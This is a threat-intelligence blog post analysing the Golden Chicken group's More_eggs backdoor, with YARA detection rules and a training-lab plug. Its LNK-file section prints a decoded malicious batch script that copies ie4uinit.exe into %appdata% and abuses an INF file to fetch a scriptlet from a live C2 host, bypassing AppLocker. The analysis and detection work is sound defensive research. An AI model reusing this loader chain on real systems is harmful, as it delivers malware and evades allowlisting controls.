Introduction
In this blog, we will delve into the activities of Golden Chicken, also known as Venom Spider, who is responsible for creating the "More_eggs" backdoor. This malware operates under a Malware-as-a-Service (MaaS) architecture, targeting the industrial services industry with the aim of harvesting sensitive information. We will explore their history, recent campaigns, and examine some of the cyber weapons they utilize for espionage.
This research is particularly pertinent given their latest campaign, which uses fake job applicant lures to spread the "More_eggs" malware, as detailed in the eSentire report "More_eggs Activity Persists Via Fake Job Applicant Lures".
Golden Chicken: Who and What Are They?
Golden Chicken is the threat actor behind the “More_eggs” backdoor, a JavaScript malware that has also been used by other notorious internet crime gangs such as the Russian-based FIN6 and the Cobalt Group. The malware goes by many names, such as “SpicyOmelette”, “Skid”, and “Terraloader”, depending on the threat actor using it.
The "More_eggs" JavaScript backdoor was first spotted in the wild in 2018 under the operator “Badbullzvenom”. This sophisticated malware spread through weaponized job listing designed to lure hiring managers and job-seeking professionals. The threat actors crafted fake, infected job offers that, when opened, deployed the "More_eggs" backdoor onto the victims' systems. These deceptive tactics exploited the trust of individuals looking for employment opportunities, making the malware particularly effective in infiltrating corporate networks and harvesting sensitive information.
Golden Chicken: The Smooth Operator
In 2023, the threat actor known as “badbullzvenom,” the mastermind behind the “More_eggs” malware, was claimed to be from Moldova and was later given the code name “Jack.” Interestingly, the threat actor is also the owner of a vegetable and fruit import/export business. According to eSentire, Jack's online activities began when he was just 15 years old, when he signed up for various cybercrime forums. Further investigation revealed that “More_eggs” was not Jack’s first project; he had also developed password stealers, crypters, and other malicious tools, such as a macro builder named ‘Multiplier’ in 2015 and ‘VenomKit’, which was released in 2017.
Golden Chicken: IOCs and e-Crime Weapons
According to QuoIntelligence, Golden Chicken utilizes "TerraLoader," a multipurpose loader written in PureBasic. TerraLoader typically uses the ".ocx" file extension and is known for employing shortcut files (LNK files) contained within a zip archive. These files are often delivered through links or email attachments. The threat actor exploits legitimate Windows binaries such as "wscript," "cmd," and "ie4unit.exe" to execute malicious commands embedded within the LNK file. Later in this blog, we will analyze some of these Indicators of Compromise (IOCs) as we delve deeper into the topic.
Golden Chicken: e-Crime Weapons Analysis
In this section, we will analyze some of the cyber weapons used by Golden Chicken. We will perform a simple analysis to understand how these tools function during their campaigns. With the help of our threat intelligence community, we have obtained samples such as the malicious XLS files containing macros, the TerraLoader, malicious LNK files and the heavily obfuscated “More_eggs” JavaScript backdoor.
Initial Access: Phishing
These threat actors exploit the weakest point of an organization: its people. They use weaponized emails containing malicious attachments. By performing static analysis on these documents, we can identify unusual strings, such as API names and URLs, that a normal document wouldn't contain.
Our indicator that this document requires further investigation is the presence of the "ShellExecuteA()" string, which suggests that the document contains a payload. Using an office analysis tool, we confirmed that a payload is indeed present at the identified offset.
Our analysis reveals that the malicious XLS file functions as a downloader for TerraLoader.
Initial Access: Loader Analysis
We also obtained the “.ocx” file, which is the TerraLoader leveraged by Golden Chicken. Upon analysis, it contains interesting strings such as legitimate company names and the “libatk-x.dll” string, which can be used as an IOC for detection.
Upon checking further, it turned out that some sections are packed.
Initial Access: LNK File Analysis
The LNK file acts as a malware loader and uses native Windows tools to perform its function. Here we can see that the absolute path is ‘cmd.exe', which means it uses cmd to execute the arguments that follow.
We decode these arguments to determine what the script does on the system.
Initial Access: Decoding LNK File Script
The decoded script performs the following actions:
- Sets up several environment variables.
- Constructs the path %appdata%\Microsoft\ieuinit.inf.
- Writes configuration or script data to this .inf file.
- Copies ie4uinit.exe from C:\Windows\System32\ to %appdata%\Microsoft\.
- Executes ie4uinit.exe with a specific configuration to be run via wscript.
- Uses ie4uinit.exe to download the configuration from the C2 hxxp[://]jamesstepleton[.]com and saves it as ieuinit.inf.
@echo off
setlocal enabledelayedexpansion
:: Set meaningful variables
set "set_command=set"
call set "s=%set_command:~0,1%"
:: Set more variables
set "w=$w"
set "i=i"
set "a=a"
set "t=t"
set "d=d"
set "dot=."
set "init=init"
set "si=si"
set "e=e"
set "settings=settings"
set "inf=.inf"
set "ieuinit_inf=ieuinit.inf"
:: Construct paths
call set "appdata_path=%appdata%\Microsoft\"
call set "full_path=!appdata_path!!ieuinit_inf!"
:: Write data to the file
(for %%t in (
"[version]"
"signature = $windows nt$"
"[destinationdirs]"
"A45E=01"
"[defaultinstall.windows7]"
"UnRegisterOCXs=F07FD"
"selfiles=A45E"
"[F07FD]"
"%11%\scRobj,NI,hhpp:/jamesstepleton.com/firxmyfcjh"
"[A45E]"
"ieuinit.inf"
"[strings]"
"settings=init"
"t=t"
"servicename=' '"
"h=h"
":=:"
"/=/"
"shortsvcname=' '"
"com=com"
"b=b"
) do @echo %%~t)>"!full_path!"
:: Copy and execute the file
call set "exe_name=ie4uinit.exe"
call copy /Y %windir%\system32\!exe_name! "!appdata_path!" > nul
start "" /MIN wmic process call create "!appdata_path!!exe_name! -basesettings"
Defense Evasion: Allowlist Bypass
From the decoded script above, we can see the string “UnRegisterOCXs=F07FD”, and it turns out that this string is associated with an AppLocker bypass technique (see: AppLocker Bypass – CMSTP).
Golden Chicken: Unhatched Egg
Golden Chicken is known for using JavaScript malware. Fortunately, we have obtained an actual heavily obfuscated sample for analysis. Here is the sample script and its structure. As you can see, it includes variable declarations, conditions, and other elements typical of a standard program.
Detection: YARA Rules
To effectively detect and mitigate the threat posed by the "More_eggs" malware, YARA rules can be employed. YARA (Yet Another Recursive Acronym) is a tool used for identifying and classifying malware. By creating specific rules that match patterns found in the "More_eggs" backdoor and its associated files, security professionals can scan systems for these indicators and take appropriate action.
As an exercise, create a simple YARA rule using the details from above. Refer to the YARA documentation for guidance: Writing YARA rules — yara 4.4.0 documentation.
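As a starting point for that exercise, here is an added example rule set (written for this article, not taken from the original post or from any vendor) that turns the indicators discussed above into YARA: the “libatk-x.dll” string from the TerraLoader .ocx, the UnRegisterOCXs/scRobj directives and C2 host from the dropped ieuinit.inf, and the ie4uinit.exe copy-and-execute commands from the decoded LNK script. The rule names, file-size limits and the "3 of them" threshold are my own choices and should be tuned against your own sample set before deployment.

```yara
rule GoldenChicken_TerraLoader_OCX
{
    meta:
        description = "TerraLoader (.ocx) loader attributed to Golden Chicken / Venom Spider"
        reference   = "Golden Chicken blog: libatk-x.dll string observed in the .ocx sample"
    strings:
        // Unusual DLL name found in the packed .ocx; used as a simple IOC
        $libatk = "libatk-x.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and filesize < 10MB and $libatk
}

rule GoldenChicken_ieuinit_INF
{
    meta:
        description = "ieuinit.inf written by the More_eggs LNK stage for ie4uinit.exe"
    strings:
        // Directives from the decoded script that make ie4uinit.exe fetch a scriptlet
        $sig    = "$windows nt$" ascii nocase
        $unreg  = "UnRegisterOCXs=" ascii nocase
        $scrobj = "scRobj" ascii nocase
        $inf    = "ieuinit.inf" ascii nocase
        $c2host = "jamesstepleton.com" ascii nocase
    condition:
        filesize < 20KB and $sig and $unreg and $scrobj and ($inf or $c2host)
}

rule GoldenChicken_LNK_Batch_Stage
{
    meta:
        description = "cmd.exe arguments embedded in the LNK: copy ie4uinit.exe to %appdata% and run it via wmic"
    strings:
        // LNK argument strings are usually UTF-16, so match both ascii and wide
        $exe     = "ie4uinit.exe" ascii wide nocase
        $appdata = "%appdata%\\Microsoft\\" ascii wide nocase
        $wmic    = "wmic process call create" ascii wide nocase
        $base    = "-basesettings" ascii wide nocase
    condition:
        3 of them
}
```

Run it with `yara -r <rules.yar> <directory>` against the extracted samples; a hit on GoldenChicken_ieuinit_INF in a user's %appdata%\Microsoft\ directory is the strongest signal of the three.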
Carry on Learning with Blue Team Labs Online
Our research into the Golden Chicken threat actor, also known as Venom Spider, has provided valuable insights into their sophisticated operations and techniques. By dissecting the "More_eggs" backdoor and analyzing the initial access files they use alongside the “More_eggs” JavaScript malware, we have uncovered the intricate methods they employ to infiltrate targets and harvest sensitive information.
To see how the Golden Chicken group infiltrates their target network, we have prepared a lab called "Golden Chicken" on our platform, Blue Team Labs Online. This lab relates to this blog and provides hands-on experience with statically analyzing their e-crime weapons and TTPs. You will learn how their tactics work and gain the knowledge needed to detect them in real-world scenarios.
References
More_eggs Malware Disguised as Resumes Targets Recruiters in Phishing Attack
More_eggs Activity Persists Via Fake Job Applicant Lures
GOLDEN CHICKENS: Evolution of the MaaS